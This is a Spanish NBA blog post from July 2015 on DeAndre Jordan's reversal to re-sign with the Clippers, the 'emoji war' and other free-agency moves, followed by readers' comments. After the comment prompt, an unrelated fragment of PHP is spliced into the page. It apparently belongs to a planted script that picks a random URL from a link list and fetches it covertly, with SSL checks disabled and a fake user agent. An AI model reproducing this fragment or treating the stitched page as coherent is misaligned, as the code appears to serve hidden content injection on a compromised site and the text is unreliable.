Mercado NBA: ✈️ 🚙 🚁 🍌 🚤 🚀 🏊

09 de July de 2015 por MagicJohnson32

¡Y vosotros que pensabais que lo mejor del mercado NBA ya había pasado! Las horas previas al inicio del plazo en el que jugadores y equipos podían formalizar los acuerdos de palabra sellados estos últimos días pasarán a la historia. No es una exageración: se hablará de 8 de julio de 2015 durante mucho tiempo y no sería de extrañar que la liga introduzca alguna norma para evitar casos como el de anoche. Si os acabáis de despertar de un coma y no sabéis lo sucedido, lo resumimos: ayer por la tarde empezó a rumorearse que DeAndre Jordan se estaba replanteando su decisión de abandonar los Clippers para firmar por los Mavs. Pronto supimos que el tema iba muy en serio, que el jugador se iba a reunir con un contingente de los Clippers (básicamente media franquicia fue a verlo) y las redes sociales entraron en ebullición hasta alcanzar su punto culminante con ‘The Emoji War’ (si no sábeis que son ✈️ 🚙 🚁 🍌 🚤 🚀 🏊, no sabéis qué es Twitter). De madrugada supimos el resultado, que no es otro que la renovación de Jordan por la franquicia angelina con un contrato de 4 temporadas y cerca de 88 millones de dólares. Los detalles que se han filtrado elevan el nivel de surrealismo de lo ocurrido a la estratosfera, especialmente cuando Wojnarowski explica que los Clippers “lograron mantener a los demás fuera de la casa” de DeAndre Jordan, incluyendo a Cuban y a los agentes del jugador, y que permanecieron con el pívot hasta pasada la medianoche, cuando éste estampó su firma en su nuevo contrato. Al fin y al cabo, es normal que no se fiasen…

‘The InDrecision’ devuelve a los Clippers el status de aspirantes perdido con su no consumada marcha y deja a los Mavericks sin pívot (recordemos que dejaron ir a Tyson Chandler a los Suns) pero, por encima de todo, supone uno de esos casos de mala imagen que tan poco gustan a la NBA y ya se empieza a hablar de retrasar o eliminar el periodo de moratoria (es decir, el plazo en el que se puede negociar pero no firmar contratos).

Por lo demás, hemos sabido que el cap se incrementa esta temporada hasta los 70 millones (antes de la gran subida que se espera para el próximo verano) y se han producido un par de movimientos. Si los Mavs soñaban con enmendar su falta de pívots con Joel Anthony (ejem) llegan tarde, puesto que ha renovado por dos temporadas y 5 millones con los Pistons. Luis Scola militará la próxima temporada en los Raptors a cambio de 3 millones de dólares y Jeremy Lin será el suplente de Kemba Walker en los Charlotte Hornets (2 temporadas, 4 millones). Otro base ex Laker, Ronnie Price, firma por el mínimo con los Suns, que además recuperan para la NBA a una de las estrellas de la Euroliga los últimos años, Sonny Weems (firmará por dos temporadas y casi 6 millones). Los Hawks, por su parte, se han hecho con Justin Hamilton, a quien vimos algunos buenos detalles esta pasada temporada con los Warriors. Además, los Sacramento Kings han pensado que era buena idea traspasar a Ray McCallum a los Spurs a cambio de una 2ª ronda.

 

Comenta

12 comentarios a esta entrada

  1. Vader dice:
    #1

    Que quiten directamente el período de moratoria. Que los jugadores puedan firmar desde el primer día y si expresan dudas las franquicias puedan irse a por otras piezas sin esperar al jugador.

    – oye, que si, que firmo con vosotros.

    – pues mira lo siento, pero ya hemos firmado a T.Chandler… Si nos lo llegas ha comunicar ayer. ¿Porque no llamas a los Sixers? He oido que tienen mucho espacio salarial y les faltan pivots…

    /modo ironic off

    Se iban a terminar tantas tonterias.

    Saludos

      Citar

  2. Vader dice:
    #2

    Y eso que creo que ha tomado la mejor decisión. Este año en Mavs hubieran sufrido hasta para meterse en playoff tal y como esta el Oeste. En cambio en Clippers creo que tienen una posibilidad real de ganar el anillo. Y si además él personalmente está más tranquilo con esta vía pues perfecto, rectificar es de sabios… Pero hay que evitar que en la liga se puedan repetir estas situaciones.

    Muy bueno Clyde Drexler diciendole a Jordan que ahora su palabra vale lo mismo que sus tiros libres… XD.

    Saludos

    PS: el año que viene veremos anuncios de TV de Jordan jugando con su indecisión… Al tiempo XD

      Citar

  3. underlock dice:
    #3

    Gerald Green a mis Heat por el mínimo y una temporada.

    Estamos montando un equipazo y con la llegada de Winslow, la cosa pinta bien.

      Citar

  4. Romino dice:
    #4

    Noticia de última hora:
    Popovich como representante recogerá el próximo premio Princesa de Asturias por su contribución al hack a Jordan, táctica ampliamente discutida en el pasado pero que simboliza la fraternidad y la unión del mundo del basket. DeAndre, a su vez, candidato a los premios Razzie y a unos meses de trabajo social en Corea del Norte.

    NBA where amazing happens

      Citar

  5. FRANCHO dice:
    #5

    De lo de Deron Williams nadie va a comentar nada? vaya agencia libre mas nefasta de los Nets, y a Dallas se el apaña un poco el Backcourt

      Citar

  6. sabas dice:
    #6

    Hace 5 años hubiera pensado que era un fichajon, pero a dia de hoy creo que es tirar el dinero. Yo lo veo bien hecho por los nets.

      Citar

  7. Jose Luis dice:
    #7

    triceratops… Harkless a Portland por una segunda ronda? tu querias que le dieran minutos en Orlando, no??

      Citar

  8. Triceratops dice:
    #8

    Jose Luis:
    triceratops… Harkless a Portland por una segunda ronda? tu querias que le dieran minutos en Orlando, no??

    Error garrafal de Orlando.
    Cierto que con el drafteo de Hezonja y las combinaciones de Harris y Gordon en el SF en teoría se había quedado sin sitio. Pero este tio, con un entrenador profesional con mentalidad defensiva como Skiles hubisiese sacado todo su potencial.
    Y encima el traspaso en si es una mierda, por una 2º ronda que no te lleva a ningun lado, pudiendo dejar al chico en tu plantilla que cuando menos te lo esperas, ciualquiera se produce una lesión grave y te quedas en cuadro.

    Si le dan minutos en Portland, no tengo dudas que Harkless será una de las grandes sorpresas positivas de la temporada y podremos ver una versión buena de Ariza mas o menos en él.

      Citar

  9. Vader dice:
    #9

    Josh Smith a los Clippers, menudo equipito estan montando. El Oeste, con el regreso de Thunder y los reforzados Spurs, será más salvaje que nunca!!

      Citar

  10. Larry Bird 33 dice:
    #10

    Lo de Harkless me parece otro error por parte de Orlando por el hecho de que prácticamente lo han regalado, que lo traspasen bueno no estoy de acuerdo pero al menos que saquen una primera ronda del draft o se lo den a GSW a cambio de Looney que por cierto creo que puede ser el robo del draft o cualquier cosa útil pero una elección en torno a la 40 rara vez aporta algo.
    Respecto a los Clippers han dado un paso adelante con respecto a otras temporadas pero para mi les sigue faltando algo y si no fuese por Pierce no les daría opciones de anillo pero con The Truth aportando en el vestuario y decidiendo en PO quién sabe…

      Citar

  11. Triceratops dice:
    #11

    Que le den al fichaje de Aldridge, de West, de Rondo, de Josh Smith y a las renovaciones de Lebron, Marc Gasol ó DeAndre Jordan. El gran movimiento del verano es el fichaje de Samardo Samuels por el Barça….y lo sabeis.

      Citar

  12. Schize dice:
    #12

    Según he leído en el Marca, Ty Lawson a Houston con una segunda ronda a cambio de Papanikolau, Nick Johnson, Prigioni, Dorsey más una primera ronda.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>